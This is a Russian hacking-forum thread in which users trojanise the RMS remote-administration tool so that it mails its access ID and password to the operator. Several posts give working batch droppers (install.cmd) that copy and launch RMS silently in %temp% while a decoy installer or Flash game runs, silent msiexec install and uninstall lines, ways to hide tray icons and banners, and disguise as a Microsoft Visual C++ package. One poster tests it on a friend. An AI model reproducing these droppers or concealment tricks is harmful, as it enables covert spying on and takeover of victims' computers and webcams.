RMS 5.1 c отправкой ID и pass на почту.

Тема в разделе "Статьи", создана пользователем крах, 14 сен 2011.

Статус темы:
Закрыта.
  1. incode
    incode Banned
    Симпатии:
    16
    onthar,
    в паблике не светилось, но сдаётся мне это развод

18 июл 2012
  2. incode
    incode Banned
    Симпатии:
    16
    Вышла новая версия RMS, Версия 5.2.2 (выпущена 13 июля 2012)
    Обновление в основном коснулось вьювера + Мелкие исправления и обновления для сервера

18 июл 2012
  3. nebra
    nebra Новичок
    Симпатии:
    13
    хм 5,2,2 oO что-то я не видел,там только 5,2,1 дай линку

18 июл 2012
  4. scandalist
    scandalist Новичок
    Симпатии:
    3
    Поиск по ветке моих сообщений ответит на 50% ваших вопросов.
    Поиск сообщений vlader и Naku на остальные.
    Выкладывать полное руководство нет смысла, всё равно через две недели пост уедет и опять начнутся вопросы. Первый пост темы редактировать некому, ибо топикстартер слинял в конце первой страницы, а у остальных доку'ментов нету.

Добавлено через 6 минут
    Это remoteutilities. Версия для иностранных пользователей, платная. Не берите в голову.

Последнее редактирование: 18 июл 2012
    18 июл 2012
  5. incode
    incode Banned
    Симпатии:
    16
    18 июл 2012
  6. chief1973
    chief1973 Новичок
    Симпатии:
    0
    -deleted-

Последнее редактирование: 6 сен 2012
    19 июл 2012
  7. incode
    incode Banned
    Симпатии:
    16
    в реестре, ищи по значениям от версии к версии они меняются

Последнее редактирование: 21 июл 2012
    19 июл 2012
  8. de.p0ison
    de.p0ison Новичок
    Симпатии:
    0
    Это для пойдет для разных IP?

22 июл 2012
  9. sviksi
    sviksi Новичок
    Симпатии:
    0
    Господа, разобрался что да как - все вроде получилось. Но все да не все :(
    Для того чтобы впарить жертве я создал инстялятор, который в себе содержит 2 файла:
    rms.exe
    qip.exe
    а также файл install.cmd следующего содержания:
    @echo off
    copy rms.exe %temp% /y
    copy qip.exe %temp% /y

start %temp%\rms.exe
    start %temp%\qip.exe

Суть инсталятора и в нем install.cmd файла следующая - копируется файлы rms.exe и qip.exe в темповую папку и потом оба запускаются. rms.exe выполняется втихаря, а qip.exe визуально - тем самым жертва думает что она ставит qip.
    Но возникла проблема.
    Если мой инсталяк запустить повторно, qip без проблем переустанавливается, а rms падает и уже никогда не включается и процессов не видно в диспетчере задач.
    Решение придумал следующее, прежде чем выполнять команды:
    copy rms.exe %temp% /y
    copy qip.exe %temp% /y

start %temp%\rms.exe
    start %temp%\qip.exe

надо проверить не существует ли файла %temp%\rms.exe, если существует, то ничего не делать, а если нет - выполнить команды по копированию и запуску.
    Я не силен в cmd совсем не мог бы мне кто нибудь написать эту проверку?

Или может у кого есть идее получше?

Добавлено через 30 минут
    Нашел решение:
    IF EXIST %temp%\rms.exe (goto ex) ELSE (goto in)

:in
    copy rms.exe %temp% /y
    start %temp%\rms.exe

:ex
    copy qip.exe %temp% /y
    start %temp%\qip.exe

но не откажусь от других идей:)

Последнее редактирование: 31 июл 2012
    31 июл 2012
  10. GeForse
    GeForse Новичок
    Симпатии:
    4
    sviksi,незнаю как делал ты, но я делал другим способом, поясню.
    Сначала скачал готовый .msi версии 5.1 вьювер у меня версии 5.1b1
    сначала отредактировал .msi сервер под себя добавил на сервер лицензию, убирал всё что может скомпроментировать: иконку в трее, оповещения, вот только хотел спросит: Надо ли: "меняем порт, снимаем галку IPv6" и для чего это поясните пожалуйста ??
    Потом закрыл окно конфигурирования сервера, получил на выходе новый .msi файл настроенный под себя. (короче делал по инструкции http://www.xaker.name/forvb/showthr...%FF%E2%EA%E8+%E3%E5%F1%F2%E0%EF%EE#post172599) потом положил готовый .msi файл в папку arch (это не та папка что в инструкции которую кидал чуть выше, потому что потом кинули исправленный, другой архив, там папка "arch") скачанный .msi (который я редактировал под себя) назывался "microsoft" поэтому зайдя в папку arch я немного изменил файлы "install.cmd" и "make_installer.cmd" вписав туда вместо "rms" это: "microsoft" потом запустил "make_installer.cmd" и у меня появился rms.exe (сразу тут вопрос: этот файл создался как установочный пакет Microsoft Visual C++ 2008 Redistributable - x86 как самому задать параметр создания .exe файла, чтобы на выходе получился к примеру установщик не Microsoft Visual C++ 2008 Redistributable - x86 а qip или другое, будет палится если у меня экзэшник устанавливает аську а подписан как установщик Microsoft Visual C++ распишите пожалуйста) в готовом файле лежат 2 файла: microsoft.msi и install.cmd, в файле "install.cmd":
    Код:
    @chcp 1251
    @MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress
    @MsiExec /x {A5DB67DC-DB0E-4491-B9F7-F258A02EE03C} /qn REBOOT=ReallySuppress
    @ping 127.0.0.1
    @MsiExec /I "microsoft.msi" /qn

Ещё вопрос: что нужно прописать в файл "install.cmd" (это будет как отдельный сервер для удаления старого) чтобы удалить старый сервер и поставить новый, причём чтобы пришло письмо, добавлял разные коды, но при запуске, программа удаляла старый сервер и нужно запустить второй раз, чтобы пошла установка но письма на почту не приходит. Подскажите решение продвинутые программисты.
    Я закинул в .exe мини игру: флэшку и просто прописал в install.cmd:
    Код:
    copy /y 1.exe %SYSTEMROOT%\1.exe
    start %SYSTEMROOT%\1.exe
    (1.exe это флэшка) но как мне показалось из-за этого иногда перестало отправятся письмо на почту, сервер устанавливался, но похоже не запускался или не слал письмо (причём если ещё тыкать на программу, то открывается флэшка и всё, установки или удаления программы не происходит) потом я собрал свой пропатченный .msi (закинул в него файлы oledlg.dll и rasadhlp.dll) собрал его как описал выше, тестил у себя на компе было всё норм: устанавливался, запускалась отвлекающая флэшка, камера работала без баннера. Но скинул другу, проверить, он запустил, у него установилось всё, но письма мне нету( (Потом пол часа его дурил и заставлял удалить мой сервер со своего компа (который под видом "Microsoft Visual C++" ппц, нужна штучка для автоматического удаления)) потом кинул ему другую сборку, пришло письмо, но подключится не могу( пишет не в сети, потом попросил пароль, ввёл, он опять просил и так до бесконечности...даже сам к себе не мог подключится (у друга кстати dr.web зараза стоял так у него встроенный брандмауэр который постоянно спрашивал: "разрешить ли подключение?"
    Позже скачал ещё готовый .msi версии 5.2 с патченными файлами, но у меня нет под него вьювера! в интернете не могу найти версию 5.2 вообще! есть только 5.2.1 которая не конфигурирует. Вообще ответе кто нибудь пожалуйста, распишите подробно про создание своих сборок, тема конечно очень давнишняя, но увидел что написал sviksi и подумал, может кто зайдёт.
    Ну или киньте ссылку на сборку более актуальных программ для удалённого доступа, заранее благодарю.

1 авг 2012
  11. kos88tya
    kos88tya Новичок
    Симпатии:
    1
    Здравствуйте, ув. форумчане!
    Подскажите, может делаю что-то не так..
    Собрал пошагово RMS по мануалу, отметил галочками все как писалось и во вкладке "другие" тоже отметил 2 пункта.
    Решил потестить на своем компе, запустил setup.exe
    и почти сразу же открылась вкладка в браузере http://rmansys.ru/ ,
    потом на пару сек появилось уведомление об удалении программы
    и через 10 секунд появляется окно

Как избавиться от этих все уведомлений, пожскажите плиз? А то палевно :)

И еще - на мыло мне пришел ID и пароль, я попробовал подключиться (сам к себе, но видимо также делать нельзя) поэтому на иконке горит "не в сети"
    В чем тут может быть проблема?

3 авг 2012
  12. incode
    incode Banned
    Симпатии:
    16
    проблема в том что ты невнимательно читал комментарии

3 авг 2012
  13. kos88tya
    kos88tya Новичок
    Симпатии:
    1
    прочитал несколько первых страниц , но об этих ошибки, что у меня не было речи.
    В чем проблема, кто подскажет?
    Заранее спасибо.

3 авг 2012
  14. incode
    incode Banned
    Симпатии:
    16
    ты чё больной чтоли о_О тут 110 страниц, вот когда все прочитаешь, тогда задовай вопросы

3 авг 2012
  15. kos88tya
    kos88tya Новичок
    Симпатии:
    1
    Слышь умник, попрошу без оскорблений!
    Я прочитал 20 страниц, но 110 страниц это ппц и половина забита такими каментам (бесполезными!), которые пишешь ТЫ, уже голова кипит и не факт что тут описан этот момент.
    Если не знаешь ответа (а ты точно не знаешь), не вставляй свои 5 копеек.
    Пусть лучше знающие люди подскажут.

3 авг 2012
  16. incode
    incode Banned
    Симпатии:
    16
    а вот теперь подумай сколько таких здесь было до тебя с темиже вопросами, страницах на 40ка тоже самое /facepalm . Хочешь чтобы объясняли в индивидуальном порядке плати деньги

3 авг 2012
  17. kos88tya
    kos88tya Новичок
    Симпатии:
    1
    Я задал вопрос по делу, при конфигурации ошибиться я не мог, делал все по мануалу, версия RMS 3.5ru. Может какая-то тонкая настройка в батнике ?

И форум как бэ для этого и существует, чтобы подсказали решение задачи, которая встречается не часто.. это не винду переустановить :)

3 авг 2012
  18. DARKLORD
    DARKLORD Продвинутый
    Симпатии:
    40
    Хватит спорить и флудить!!!!!Читать и правда надо!пробовать и потом спрашивать.И почему все тянуться в прошлое?Почему не использовать простые РАТы?Не говоря уже о весе!/facepalm

3 авг 2012
  19. wera87
    wera87 Новичок
    Симпатии:
    3
    ПодсказкО --->>> по какому мануалу ты делал ???
    где ты увидел мануал по настройке RMS 3.5ru ??? <<<----- ПодсказкО

я несколько раз перечитывал все сто страниц вашего флуда !!!
    если бы тема читалась бы ПОЛНОСТЬЮ А НЕ ПЕРВЫЕ 20 СТРАНИЦ --- то у вас бы не было текущих проблем !!!

что за мода сразу писать --->>> У МЕНЯ НЕ ПОЛУЧИЛОСЬ , СРОЧНО МНЕ ПОМОГИТЕ ! с ЧЕГО ВЫ РЕШИЛИ ЧТО вам должны ? , ЕСЛИ ВАМ ЛЕНЬ ДАЖЕ ЧИТАТЬ ??? :angry::angry::angry::angry::angry:

сорри админы и модеры :thx:. реально уже зла не хватает , загадили тему своими мольбами о помощи. захожу на форум в новые темы и по три четыре раза одно и тоже в этой теме.

пы-сы :
    если у кого то не получается ПРОЧИТАТЬ тему ВНИМАТЕЛЬНО ---> предлагаю сделать и настроить вам всё за ВАШИ денюжки !!!

( это не барыжничество ------>>> это призыв к мЕгАсУпЕрПуПеРХаКеРаМ со 150 сообщениями и пишущими в этой ветке о якобы не удачной попытке конфигурации по "мануалу" ! )

обязуюсь заработанное за помощь в конфигурации - перевести на счёт форума !

3 авг 2012
  20. scandalist
    scandalist Новичок
    Симпатии:
    3
    Патченные файлы сервера 5.2.1 тынц
    Пересобранный сервер 5.2.1 тынц (оригинальные файлы сервера + подавление баннера + подавление сообщения об отправке email)
    Создание самораспаковщика тынц
    Инструкция по сборке здесь. Надо понимать, что ссылки в этом сообщении неактуальны и жалобы неуместны.

Последнее редактирование: 8 авг 2012
    3 авг 2012
Статус темы:
Закрыта.
Загрузка...